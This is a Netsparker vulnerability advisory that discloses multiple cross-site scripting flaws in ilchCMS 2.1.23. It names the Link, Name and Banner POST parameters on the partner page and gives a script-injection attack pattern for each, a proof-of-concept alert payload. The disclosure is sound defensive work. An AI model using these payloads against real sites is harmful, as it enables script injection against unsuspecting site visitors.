Share
Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Cross-site Scripting Vulnerabilities in ilchCMS 2.1.23  
Affected Software: ilchCMS  
Affected Versions: 2.1.23  
Vendor Homepage: https://www.ilch.de/  
Vulnerability Type: Cross-site Scripting  
Severity: Medium  
Status: Fixed  
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-016  
  
Technical Details  
--------------------  
  
URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Link  
Parameter Type: Post  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Name  
Parameter Type: Post  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index  
Parameter Name: Banner  
Parameter Type: Post  
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>  
  
Note  
  
- Auth: No  
- Token: Yes  
  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-19-016-cross-site-scripting-in-ilchcms/